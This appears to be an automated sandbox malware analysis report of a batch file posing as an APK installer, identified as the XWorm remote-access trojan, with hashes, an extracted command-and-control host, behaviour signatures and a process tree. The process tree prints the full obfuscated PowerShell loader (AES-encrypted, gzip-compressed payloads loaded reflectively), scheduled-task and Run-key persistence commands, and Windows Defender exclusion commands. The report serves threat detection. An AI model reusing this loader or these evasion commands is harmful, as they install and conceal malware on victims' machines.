Analysis
-
max time kernel
57s -
max time network
57s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 15:44
Static task
static1
Behavioral task
behavioral1
Sample
APK_Installer.bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
APK_Installer.bat
Resource
win10v2004-20240508-en
General
-
Target
APK_Installer.bat
-
Size
302KB
-
MD5
7a5f5944302b8298714b56ae2f138b7c
-
SHA1
669b42f2f6e76895899d84d5ad7a12f23d951f13
-
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
-
SHA512
73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
SSDEEP
6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4612-49-0x00000291E5DF0000-0x00000291E5E0A000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 36 4612 powershell.exe 38 4612 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2804 powershell.exe 4320 powershell.exe 3140 powershell.exe 2008 powershell.exe 4612 powershell.exe 3276 powershell.exe 2952 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3392 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133615574881754493" chrome.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exepid process 3276 powershell.exe 3276 powershell.exe 2952 powershell.exe 2952 powershell.exe 4612 powershell.exe 4612 powershell.exe 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 4320 powershell.exe 4320 powershell.exe 3140 powershell.exe 3140 powershell.exe 3140 powershell.exe 2008 powershell.exe 2008 powershell.exe 2008 powershell.exe 4612 powershell.exe 4288 chrome.exe 4288 chrome.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid process 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3276 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeIncreaseQuotaPrivilege 2952 powershell.exe Token: SeSecurityPrivilege 2952 powershell.exe Token: SeTakeOwnershipPrivilege 2952 powershell.exe Token: SeLoadDriverPrivilege 2952 powershell.exe Token: SeSystemProfilePrivilege 2952 powershell.exe Token: SeSystemtimePrivilege 2952 powershell.exe Token: SeProfSingleProcessPrivilege 2952 powershell.exe Token: SeIncBasePriorityPrivilege 2952 powershell.exe Token: SeCreatePagefilePrivilege 2952 powershell.exe Token: SeBackupPrivilege 2952 powershell.exe Token: SeRestorePrivilege 2952 powershell.exe Token: SeShutdownPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeSystemEnvironmentPrivilege 2952 powershell.exe Token: SeRemoteShutdownPrivilege 2952 powershell.exe Token: SeUndockPrivilege 2952 powershell.exe Token: SeManageVolumePrivilege 2952 powershell.exe Token: 33 2952 powershell.exe Token: 34 2952 powershell.exe Token: 35 2952 powershell.exe Token: 36 2952 powershell.exe Token: SeIncreaseQuotaPrivilege 2952 powershell.exe Token: SeSecurityPrivilege 2952 powershell.exe Token: SeTakeOwnershipPrivilege 2952 powershell.exe Token: SeLoadDriverPrivilege 2952 powershell.exe Token: SeSystemProfilePrivilege 2952 powershell.exe Token: SeSystemtimePrivilege 2952 powershell.exe Token: SeProfSingleProcessPrivilege 2952 powershell.exe Token: SeIncBasePriorityPrivilege 2952 powershell.exe Token: SeCreatePagefilePrivilege 2952 powershell.exe Token: SeBackupPrivilege 2952 powershell.exe Token: SeRestorePrivilege 2952 powershell.exe Token: SeShutdownPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeSystemEnvironmentPrivilege 2952 powershell.exe Token: SeRemoteShutdownPrivilege 2952 powershell.exe Token: SeUndockPrivilege 2952 powershell.exe Token: SeManageVolumePrivilege 2952 powershell.exe Token: 33 2952 powershell.exe Token: 34 2952 powershell.exe Token: 35 2952 powershell.exe Token: 36 2952 powershell.exe Token: SeIncreaseQuotaPrivilege 2952 powershell.exe Token: SeSecurityPrivilege 2952 powershell.exe Token: SeTakeOwnershipPrivilege 2952 powershell.exe Token: SeLoadDriverPrivilege 2952 powershell.exe Token: SeSystemProfilePrivilege 2952 powershell.exe Token: SeSystemtimePrivilege 2952 powershell.exe Token: SeProfSingleProcessPrivilege 2952 powershell.exe Token: SeIncBasePriorityPrivilege 2952 powershell.exe Token: SeCreatePagefilePrivilege 2952 powershell.exe Token: SeBackupPrivilege 2952 powershell.exe Token: SeRestorePrivilege 2952 powershell.exe Token: SeShutdownPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeSystemEnvironmentPrivilege 2952 powershell.exe Token: SeRemoteShutdownPrivilege 2952 powershell.exe Token: SeUndockPrivilege 2952 powershell.exe Token: SeManageVolumePrivilege 2952 powershell.exe Token: 33 2952 powershell.exe Token: 34 2952 powershell.exe Token: 35 2952 powershell.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
chrome.exepid process 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
chrome.exepid process 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe 4288 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4612 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exechrome.exedescription pid process target process PID 4452 wrote to memory of 3276 4452 cmd.exe powershell.exe PID 4452 wrote to memory of 3276 4452 cmd.exe powershell.exe PID 3276 wrote to memory of 2952 3276 powershell.exe powershell.exe PID 3276 wrote to memory of 2952 3276 powershell.exe powershell.exe PID 3276 wrote to memory of 2728 3276 powershell.exe WScript.exe PID 3276 wrote to memory of 2728 3276 powershell.exe WScript.exe PID 2728 wrote to memory of 4976 2728 WScript.exe cmd.exe PID 2728 wrote to memory of 4976 2728 WScript.exe cmd.exe PID 4976 wrote to memory of 4612 4976 cmd.exe powershell.exe PID 4976 wrote to memory of 4612 4976 cmd.exe powershell.exe PID 4612 wrote to memory of 2804 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 2804 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 4320 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 4320 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 3140 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 3140 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 2008 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 2008 4612 powershell.exe powershell.exe PID 4612 wrote to memory of 632 4612 powershell.exe schtasks.exe PID 4612 wrote to memory of 632 4612 powershell.exe schtasks.exe PID 4288 wrote to memory of 4980 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 4980 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2616 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2952 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 2952 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe PID 4288 wrote to memory of 1672 4288 chrome.exe chrome.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_870_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_870.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_870.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_870.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_870.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_870.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2008
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:632
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"6⤵PID:3988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp.bat""6⤵PID:4688
-
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:3392
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffee3deab58,0x7ffee3deab68,0x7ffee3deab782⤵PID:4980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:22⤵PID:2616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:82⤵PID:2952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:82⤵PID:1672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:12⤵PID:1696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:12⤵PID:224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4316 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:12⤵PID:2200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:82⤵PID:4940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4612 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:82⤵PID:4776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4688 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:82⤵PID:4584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:82⤵PID:3596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 --field-trial-handle=1952,i,7666308903816656342,9562658877685215037,131072 /prefetch:82⤵PID:3264
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:2364
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD57bdd8682df66300258bdaa18118465f9
SHA1d4ef2b01eff7f3980bc32092ea030b4300dbff18
SHA256fdca49797825a0d88211b63dd419306672f61526fbeb0c3b15f3e9391ac4ede3
SHA51245e01dc1e5453b0d24fbd1cb7314ed3628ebf61ee6719898e15c0c8d98f30c80e9fd5d00b04bec5fc8ee287d916813558518ea231888014796da926780a0dbd8
-
Filesize
6KB
MD5b5e3bae3ab1ca6c967f77983b0571bee
SHA1eb514da86bf9092afc9994ba5baee4736bbf2c34
SHA25620c2bd58560dc543c63757c77656ef5469a52d58684772d56b614ee9df826131
SHA5120a8452135a90c397c3a964c61c8e967911d30d69585ebe05e40b2f182415fc8aca3bdd7589747d1dd7168192179d73eddd034fe73bc7a0523b433d8f28155497
-
Filesize
16KB
MD5fa23db907dd1fb044bc3c403da3864ec
SHA1a7a55124ac2de917af80c0fe6562e453aa62ef8b
SHA256b64bee4bc4c261e1259c73737705343abfd0970fc6f79ba4f8f70c71b26249ee
SHA512087488bcaa7f3ad87fea09b0fe3c4e7768adc61b2f9c272af558e8a4e1b45abba91ba54c2aebdcbebb1d44a4cb832219581b692abbdf61dd8cd909edf770b2d4
-
Filesize
260KB
MD539097a526ef02b4975918239479a1fe6
SHA1c4da87968969a9a8a2aa394a68fb541d8c7bbcf6
SHA256deb1aa72e017d4f454ce89d486553d8bff9e7f06005c30cd16e07c10ed6b0c5c
SHA512ecce943dd9693d62be7c0b05879c393468de6dad57b5f976465eba7bba69f63ceda94727d99b293e14d9a4aa9011b9dac9342061509dab00b5748c9d469d1b89
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD54f320df07ce05d3bd03fbfd865aeac57
SHA12cfae455c1e7fb7238d3dcba6648f6a9bdd8d296
SHA25608590742934077211509331f5e2e37f54a08785bf2745f7c5d975320e2412365
